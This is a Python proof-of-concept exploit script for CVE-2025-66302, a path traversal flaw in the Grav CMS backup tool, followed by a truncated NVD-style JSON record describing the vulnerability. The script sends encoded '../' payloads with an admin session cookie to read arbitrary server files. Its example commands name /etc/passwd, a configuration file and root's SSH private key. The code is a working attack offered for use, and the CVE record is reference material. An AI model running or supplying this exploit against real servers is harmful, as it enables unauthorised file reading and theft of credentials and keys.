CVE-2025-66302

# CVE-2025-66302 PoC - Grav CMS Path Traversal in Backup Tool # Requires authenticated admin session import requests import argparse from urllib.parse import quote def exploit_grav_path_traversal(target_url, target_file, cookie): """ Exploit path traversal vulnerability in Grav CMS backup tool to read arbitrary files from the server filesystem. :param target_url: Base URL of the vulnerable Grav CMS instance :param target_file: Absolute path of file to read (e.g., /etc/passwd) :param cookie: Authentication cookie (requires admin privileges) """ # Construct path traversal payload # Using ../../../../ to escape webroot and navigate to system directories traversal_depth = "../../../../" payload_path = traversal_depth + target_file.lstrip('/') # Encode the path to bypass basic filters encoded_payload = quote(payload_path, safe='') # Target endpoint - backup tool functionality backup_endpoint = f"{target_url.rstrip('/')}/admin/tools/backup" headers = { 'Cookie': cookie, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } # Send malicious request params = { 'action': 'backup', 'file': encoded_payload } try: response = requests.get(backup_endpoint, params=params, headers=headers, timeout=30) if response.status_code == 200: print(f"[+] Successfully retrieved file: {target_file}") print("=" * 60) print(response.text[:5000]) # Print first 5000 chars print("=" * 60) return True else: print(f"[-] Request failed with status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False # Example usage if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2025-66302 Grav CMS Path Traversal') parser.add_argument('--url', required=True, help='Target Grav CMS URL') parser.add_argument('--file', required=True, help='File to read') parser.add_argument('--cookie', required=True, help='Admin session cookie') args = parser.parse_args() exploit_grav_path_traversal(args.url, args.file, args.cookie) # Example commands: # python cve-2025-66302.py --url http://target.com/grav --file etc/passwd --cookie "grav-admin=xxx" # python cve-2025-66302.py --url http://target.com --file var/www/html/grav/config/system.yaml --cookie "grav-admin=xxx" # python cve-2025-66302.py --url http://target.com --file root/.ssh/id_rsa --cookie "grav-admin=xxx"

{"cve": {"id": "CVE-2025-66302", "sourceIdentifier": "[email protected]", "published": "2025-12-01T22:15:49.750", "lastModified": "2025-12-03T16:00:53.343", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Grav is a file-based Web platform. Prior to 1.8.0-beta.27, A path traversal vulnerability has been identified in Grav CMS, allowing authenticated attackers with administrative privileges to read arbitrary files on the underlying server filesystem. This vulnerability arises due to insufficient input sanitization in the backup tool, where user-supplied paths are not properly restricted, enabling access to files outside the intended webroot directory. The impact of this vulnerability depends on the privileges of the user account running the application. This vulnerability is fixed in 1.8.0-beta.27."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.8.0", "matchCriteriaId": "0F068841-DBCC-41D5-8B24-BFCE51841E2E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "8A383F2E-C6BA-440B-B648-A3313B7D91C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta10:*:*:*:*:*:*", "matchCriteriaId": "F7EF2DEC-2798-4D0D-9C27-0F01BAFEAEFD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta11:*:*:*:*:*:*", "matchCriteriaId": "530C6F64-F30B-4E93-9A12-D9625EA57483"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta12:*:*:*:*:*:*", "matchCriteriaId": "9AC28BF9-626D-4514-91F0-F81DAB5D3602"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta13:*:*:*:*:*:*", "matchCriteriaId": "307AA375-E531-4AE5-BA79-2F9D4DE7A05F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta14:*:*:*:*:*:*", "matchCriteriaId": "C2E3E312-485D-42B0-B465-64B6438CDCAE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta15:*:*:*:*:*:*", "matchCriteriaId": "5BE4B2F9-1B6D-4D18-916A-5C95A3213222"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta16:*:*:*:*:*:*", "matchCriteriaId": "763207F0-92D1-4274-A30A-DE634C5852C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta17:*:*:*:*:*:*", "matchCriteriaId": "1DE8F350-BA07-4DAA-AE4B-5E0A532B6828"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta18:*:*:*:*:*:*", "matchCriteriaId": "F9150B94-0DF3-43F3-9806-39787A6C0E4D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta19:*:*:*:*:*:*", "matchCriteriaId": "BAA7C7EC-8FB2-445D-8A02-1743D87F5416"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "7A6BEA2A-D534-4C9E-811A-8A46E214C46D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta20:*:*:*:*:*:*", "matchCriteriaId": "7A644F57-FF39-4262-9796-7C4F3B0851C1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta21:*:*:*:*:*:*", "matchCriteriaId": "B2AFB9E7-084E-497B-B0FC-CA6A5033C5BF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta22:*:*:*:*:*:*", "matchCriteriaId": "5C5E8823-9083-4FFA-9897-CAD0340DCE68"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta23:*:*:*:*:*:*", "matchCriteriaId": "9C048938-E0EC-4AD0-9847-FD74E6770FE2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta24:*:*:*:*:*:*", "matchCriteriaId": "F7B43876-1445-418A-9707-E692FDF62C4D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta25:*:*:*:*:*:*", "matchCriteriaId": "94B209DE-01C6-41BA-B912-CF57849A9F7A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta26:*:*:*:*:*:*", "matchCriteriaId": "AB53AA10-87A5-4010-8019-BF4AA5ABC12B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8. ... (truncated)